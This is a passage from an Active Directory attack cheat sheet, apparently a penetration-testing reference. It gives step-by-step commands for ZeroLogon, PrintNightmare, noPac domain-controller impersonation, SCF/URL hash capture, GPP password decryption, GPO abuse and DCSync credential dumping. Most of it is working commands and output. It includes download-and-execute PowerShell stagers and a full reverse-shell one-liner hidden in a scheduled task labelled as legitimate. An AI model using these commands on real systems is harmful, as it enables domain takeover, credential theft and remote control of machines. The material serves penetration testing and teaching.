Done! + [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! +``` + +Then use `mimikatz` to load the ticket. + +```powershell +mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" +``` + + +#### Mitigations + +* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780 + + +### ZeroLogon + +> CVE-2020-1472 + +White Paper from Secura : https://www.secura.com/pathtoimg.php?id=2055 + +Exploit steps from the white paper + +1. Spoofing the client credential +2. Disabling signing and sealing +3. Spoofing a call +4. Changing a computer's AD password to null +5. From password change to domain admin +6. :warning: reset the computer's AD password in a proper way to avoid any Deny of Service + +* `cve-2020-1472-exploit.py` - Python script from [dirkjanm](https://github.com/dirkjanm) + ```powershell + # Check (https://github.com/SecuraBV/CVE-2020-1472) + proxychains python3 zerologon_tester.py DC01 172.16.1.5 + + $ git clone https://github.com/dirkjanm/CVE-2020-1472.git + + # Activate a virtual env to install impacket + $ python3 -m venv venv + $ source venv/bin/activate + $ pip3 install . + + # Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py) + proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5 + + # Find the old NT hash of the DC + proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL' + + # Restore password from secretsdump + # secretsdump will automatically dump the plaintext machine password (hex encoded) + # when dumping the local registry secrets on the newest version + python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3 + deactivate + ``` + +* `nccfsas` - .NET binary for Cobalt Strike's execute-assembly + ```powershell + git clone https://github.com/nccgroup/nccfsas + # Check + execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local + + # Resetting the machine account password + execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset + + # Testing from a non Domain-joined machine + execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch + + # Now reset the password back + ``` + +* `Mimikatz` - 2.2.0 20200917 Post-Zerologon + ```powershell + privilege::debug + # Check for the CVE + lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ + + # Exploit the CVE and set the computer account's password to "" + lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit + + # Execute dcsync to extract some hashes + lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm + lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm + + # Pass The Hash with the extracted Domain Admin hash + sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN + + # Use IP address instead of FQDN to force NTLM with Windows APIs + # Reset password to Waza1234/Waza1234/Waza1234/ + # https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584 + lsadump::postzerologon /target:10.10.10.10 /account:DC01$ + ``` + +* `CrackMapExec` - only check + ```powershell + crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon + ``` + +A 2nd approach to exploit zerologon is done by relaying authentication. + +This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity. +The following prerequisites are needed: +* A domain account +* One DC running the `PrintSpooler` service +* Another DC vulnerable to zerologon + +* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) + ```powershell + # Check if one DC is running the PrintSpooler service + rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" + + # Setup ntlmrelay in one shell + ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support + + #Trigger printerbug in 2nd shell + python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 + ``` + +### PrintNightmare + +> CVE-2021-1675 / CVE-2021-34527 + +The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`. +The exploit will execute the DLL either from the local filesystem or a remote share. + +Requirements: +* **Spooler Service** enabled (Mandatory) +* Server with patches < June 2021 +* DC with `Pre Windows 2000 Compatibility` group +* Server with registry key `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall` = (DWORD) 1 +* Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0 + + +**Detect the vulnerability**: +* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) + ```ps1 + python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' + Protocol: [MS-RPRN]: Print System Remote Protocol + ``` +* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream) + ```ps1 + git clone https://github.com/byt3bl33d3r/ItWasAllADream + cd ItWasAllADream && poetry install && poetry shell + itwasalladream -u user -p Password123 -d domain 10.10.10.10/24 + docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10 + ``` + +**Payload Hosting**: +* The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): +```ps1 +python3 ./smbserver.py share /tmp/smb/ +``` +* Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): +```ps1 +Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable +``` +* Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): +```ps1 +SharpWebServer.exe port=8888 dir=c:\users\public verbose=true +``` +When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` +WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: +```ps1 +cme smb -u user -p password -d domain.local -M webdav [TARGET] +``` + +**Trigger the exploit**: + +* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675) + ```powershell + # require a modified Impacket: https://github.com/cube0x0/impacket + python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' + python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' + ## LPE + SharpPrintNightmare.exe C:\addCube.dll + ## RCE using existing context + SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' + ## RCE using runas /netonly + SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 + ``` +* [Invoke-Nightmare](https://github.com/calebstewart/CVE-2021-1675) + ```powershell + ## LPE only (PS1 + DLL) + Import-Module .\cve-2021-1675.ps1 + Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default + Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" + Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll" + ``` +* [Mimikatz v2.2.0-20210709+](https://github.com/gentilkiwi/mimikatz/releases) + ```powershell + ## LPE + misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll + ## RCE + misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 + ``` +* [PrintNightmare - @outflanknl](https://github.com/outflanknl/PrintNightmare) + ```powershell + PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password] + ``` + +**Debug informations** + +| Error | Message | Debug | +|--------|---------------------|------------------------------------------| +| 0x5 | `rpc_s_access_denied` | Permissions on the file in the SMB share | +| 0x525 | `ERROR_NO_SUCH_USER` | The specified account does not exist. | +| 0x180 | unknown error code | Share is not SMB2 | + + +### samAccountName spoofing + +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller. + +**Requirements** + +* MachineAccountQuota > 0 + +**Check for exploitation** + +0. Check the MachineAccountQuota of the account + ```powershell + crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ + StandIn.exe --object ms-DS-MachineAccountQuota=* + ``` +1. Check if the DC is vulnerable + ```powershell + crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac + ``` + +**Exploitation** + +0. Create a computer account + ```powershell + impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' + + powermad@windows> . .\Powermad.ps1 + powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force + powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose + + sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword + ``` +1. Clear the controlled machine account `servicePrincipalName` attribute + ```ps1 + impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController + + powershell@windows> . .\Powerview.ps1 + powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose + ``` +2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$` + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1224 + impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose + ``` +3. Request a TGT for the controlled machine account + ```ps1 + impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' + + cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap + ``` +4. Reset the controlled machine account sAMAccountName to its old value + ```ps1 + impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose + ``` +5. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1202 + impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' + + cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] + ``` +6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` + +Automated exploitation: + +* [cube0x0/noPac](https://github.com/cube0x0/noPac) - Windows + ```powershell + noPac.exe scan -domain htb.local -user user -pass 'password123' + noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt + noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator + ``` +* [Ridter/noPac](https://github.com/Ridter/noPac) - Linux + ```ps1 + python noPac.py 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip 10.10.10.10 -use-ldap -dump + ``` +* [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin) + ```ps1 + $ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell + [*] Selected Target dc.caltech.white + [*] Total Domain Admins 11 + [*] will try to impersonat gaylene.dreddy + [*] Current ms-DS-MachineAccountQuota = 10 + [*] Adding Computer Account "SAMTHEADMIN-11$" + [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL + [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL. + [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white + [*] SAMTHEADMIN-11$ sAMAccountName == dc + [*] Saving ticket in dc.ccache + [*] Resting the machine account to SAMTHEADMIN-11$ + [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value + [*] Using TGT from cache + [*] Impersonating gaylene.dreddy + [*] Requesting S4U2self + [*] Saving ticket in gaylene.dreddy.ccache + [!] Launching semi-interactive shell - Careful what you execute + C:\Windows\system32>whoami + nt authority\system + ``` +* [ly4k/Pachine](https://github.com/ly4k/Pachine) + ```powershell + usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] + [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] + [domain/]username[:password] + $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!' + $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!' + $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache + $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local' + ``` + +**Mitigations**: +* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) +* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) +* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) +* [KB5007205 - Windows Server 2022](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007205-os-build-20348-350-af102e6f-cc7c-4cd4-8dc2-8b08d73d2b31) +* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) +* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) + + +## Open Shares + +> Some shares can be accessible without authentication, explore them to find some juicy files + +* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap) + ```powershell + smbmap -H 10.10.10.10 # null session + smbmap -H 10.10.10.10 -R # recursive listing + smbmap -H 10.10.10.10 -u invaliduser # guest smb session + smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" + ``` + +* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) + ```powershell + pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share + pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ + ls # list files + cd # move inside a folder + get # download files + put # replace a file + ``` + +* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) + ```powershell + smbclient -I 10.10.10.100 -L ACTIVE -N -U "" + Sharename Type Comment + --------- ---- ------- + ADMIN$ Disk Remote Admin + C$ Disk Default share + IPC$ IPC Remote IPC + NETLOGON Disk Logon server share + Replication Disk + SYSVOL Disk Logon server share + Users Disk + use Sharename # select a Sharename + cd Folder # move inside a folder + ls # list files + ``` + +* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers](#) + ```powershell + smbclient -U username //10.0.0.1/SYSVOL + smbclient //10.0.0.1/Share + + # Download a folder recursively + smb: \> mask "" + smb: \> recurse ON + smb: \> prompt OFF + smb: \> lcd '/path/to/go/' + smb: \> mget * + ``` + + +* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler) + ```ps1 + snaffler.exe -s - snaffler.log + + # Snaffle all the computers in the domain + ./Snaffler.exe -d domain.local -c -s + + # Snaffle specific computers + ./Snaffler.exe -n computer1,computer2 -s + ​ + # Snaffle a specific directory + ./Snaffler.exe -i C:\ -s + ``` + + +## SCF and URL file attack against writeable share + +Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) + +```ps1 +# Farmer to receive auth +farmer.exe [seconds] [output] +farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely +farmer.exe 8888 60 # one minute + +# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks +crop.exe [options] +Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico +Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec +``` + +### SCF Files + +Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` + +```powershell +[Shell] +Command=2 +IconFile=\\10.10.10.10\Share\test.ico +[Taskbar] +Command=ToggleDesktop +``` + +Using [`crackmapexec`](https://github.com/mpgn/CrackMapExec/blob/master/cme/modules/slinky.py): + +```ps1 +crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf +crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk +crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP +``` + +### URL Files + +This attack also works with `.url` files and `responder -I eth0 -v`. + +```powershell +[InternetShortcut] +URL=whatever +WorkingDirectory=whatever +IconFile=\\10.10.10.10\%USERNAME%.icon +IconIndex=1 +``` + +### Windows Library Files + +> Windows Library Files (.library-ms) + +```xml + + + @windows.storage.dll,-34582 + 6 + true + imageres.dll,-1003 + + {7d49d726-3c21-4f05-99aa-fdc2c9474656} + + + + true + false + + \\\\workstation@8888\\folder + + + + +``` + +### Windows Search Connectors Files + +> Windows Search Connectors (.searchConnector-ms) + +```xml + + + imageres.dll,-1002 + Microsoft Outlook + false + true + \\\\workstation@8888\\folder.ico + + {91475FE5-586B-4EBA-8D75-D17434B8CDF6} + + + \\\\workstation@8888\\folder + + +``` + + +## Passwords in SYSVOL & Group Policy Preferences + +Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\\SYSVOL\\Policies\`. + +```powershell +findstr /S /I cpassword \\\sysvol\\policies\*.xml +``` + +Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx) + +```bash +echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 + +e.g: +echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 + +echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 +``` + +### Automate the SYSVOL and passwords research + +* `Metasploit` modules to enumerate shares and credentials + ```c + scanner/smb/smb_enumshares + post/windows/gather/enum_shares + post/windows/gather/credentials/gpp + ``` + +* CrackMapExec modules + ```powershell + cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin + cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password + ``` + +* [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) + ```powershell + # with a NULL session + Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER' + + # with cleartext credentials + Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' + + # pass-the-hash + Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' + ``` + +### Mitigations + +* Install [KB2962486](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025) on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences. +* Delete existing GPP xml files in SYSVOL containing passwords. +* Don’t put passwords in files that are accessible by all authenticated users. + +## Exploit Group Policy Objects GPO + +> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner + +:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local + +GPO are stored in the DC in `\\\SYSVOL\\Policies\\`, inside two folders **User** and **Machine**. +If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks`. + +:warning: Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command: `gpupdate /force`. + +### Find vulnerable GPO + +Look a GPLink where you have the **Write** right. + +```powershell +Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} +``` + +### Abuse GPO with SharpGPOAbuse + +```powershell +# Build and configure SharpGPOAbuse +$ git clone https://github.com/FSecureLABS/SharpGPOAbuse +$ Install-Package CommandLineParser -Version 1.9.3.15 +$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll + +# Adding User Rights +.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" + +# Adding a Local Admin +.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO" + +# Configuring a User or Computer Logon Script +.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" + +# Configuring a Computer or User Immediate Task +# /!\ Intended to "run once" per GPO refresh, not run once per system +.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" +.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\User' --TaskName "EvilTask" --Arguments "/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND " --Command "cmd.exe" --Force +``` + +### Abuse GPO with PowerGPOAbuse + +* https://github.com/rootSySdk/PowerGPOAbuse + +```ps1 +PS> . .\PowerGPOAbuse.ps1 + +# Adding a localadmin +PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' + +# Assign a new right +PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' + +# Adding a New Computer/User script +PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' + +# Create an immediate task +PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO' +``` + +### Abuse GPO with pyGPOAbuse + +```powershell +$ git clone https://github.com/Hackndo/pyGPOAbuse + +# Add john user to local administrators group (Password: H4x00r123..) +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" + +# Reverse shell example +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ + -powershell \ + -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ + -taskname "Completely Legit Task" \ + -description "Dis is legit, pliz no delete" \ + -user +``` + +### Abuse GPO with PowerView + +```powershell +# Enumerate GPO +Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} + +# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO +New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force +``` + +### Abuse GPO with StandIn + +```powershell +# Add a local administrator +StandIn.exe --gpo --filter Shards --localadmin user002 + +# Set custom right to a user +StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege" + +# Execute a custom command +StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args" +``` + +## Dumping AD Domain Credentials + +You will need the following files to extract the ntds : +- NTDS.dit file +- SYSTEM hive (`C:\Windows\System32\SYSTEM`) + +Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. +- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). +- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. + +However you can change the location to a custom one, you will need to query the registry to get the current location. + +```powershell +reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" +``` + +### DCSync Attack + +DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. + +* DCSync only one user + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt + ``` +* DCSync all users of the domain + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /all /csv + + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi + ``` + +> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. + + +### Volume Shadow Copy + +The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process. + +* [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin) + ```powershell + vssadmin create shadow /for=C: + copy 